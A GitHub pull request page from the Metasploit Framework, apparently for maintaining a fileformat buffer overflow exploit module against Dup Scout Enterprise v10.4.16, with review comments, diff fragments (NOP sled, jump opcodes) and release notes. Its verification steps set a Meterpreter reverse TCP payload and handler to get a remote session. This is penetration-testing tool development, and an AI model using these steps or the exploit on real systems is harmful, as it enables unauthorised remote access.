Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Updated Dup Scout Documentation and Module Based on Vuln Analysis #9478

Merged
merged 5 commits into from
Feb 8, 2018

Conversation

jrobles-r7
Copy link
Contributor

@jrobles-r7 jrobles-r7 commented Jan 30, 2018

This PR updates the Dup Scout Enterprise v10.4.16 buffer overflow exploit module.

Verification

List the steps needed to make sure this thing works

  • Install DupScout Enterprise on target system
  • ./msfconsole
  • use exploit/windows/fileformat/dupscout_xml
  • set payload windows/meterpreter/reverse_tcp
  • set lhost <lhost>
  • run
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost <lhost>
  • run
  • From the DupScout Enterprise menu select Command -> Import Command
  • Select file generated by metasploit
  • Get a session

@jrobles-r7 jrobles-r7 changed the title Modified Dup Scout Fileformat Exploit Code Use make_nops in Dup Scout exploit Jan 31, 2018
@jrobles-r7 jrobles-r7 changed the title Use make_nops in Dup Scout exploit Use make_fast_nops in Dup Scout exploit Jan 31, 2018

buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
buffer << "\x90" * 1560
buffer << nops[0,1560]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I would just call make_nops for the size we need in all these cases since slicing into the nop stream is not guaranteed to be safe.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Lol, we discussed this on Slack yesterday.

esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
jmp = "\xFF\xE0" # JMP ESP
jmp = "\xFF\xE0" # JMP EAX
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Nice catch!

Update the documentation based on analysis of the vulnerability.
Slight modifications to the exploit module as well to reduce the
size of the generated file and reduce bad characters.
@jrobles-r7 jrobles-r7 changed the title Use make_fast_nops in Dup Scout exploit Updated Dup Scout Documentation and Module Based on Vuln Analysis Feb 1, 2018
@jrobles-r7
Copy link
Contributor Author

I fixed the changes here @wvu-r7 .

@jrobles-r7
Copy link
Contributor Author

I need to update the headings for this documentation too...

@busterb
Copy link
Member

busterb commented Feb 8, 2018

LGTM, thanks @jrobles-r7

@busterb busterb merged commit ab0d186 into rapid7:master Feb 8, 2018
busterb added a commit that referenced this pull request Feb 8, 2018
jmartin-tech pushed a commit to jmartin-tech/metasploit-framework that referenced this pull request Feb 8, 2018
@jmartin-tech
Copy link
Contributor

jmartin-tech commented Feb 8, 2018

Release Notes

The exploits/windows/fileformat/dupscout_xml module no longer considers as many characters unusable, so there are more options for generating payloads. The module has also been streamlined to generate smaller payloads.

@jrobles-r7 jrobles-r7 deleted the dupscout-updates branch February 20, 2018 13:15
@allrosenthal-r7 allrosenthal-r7 added the rn-enhancement release notes enhancement label Feb 27, 2018
This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

6 participants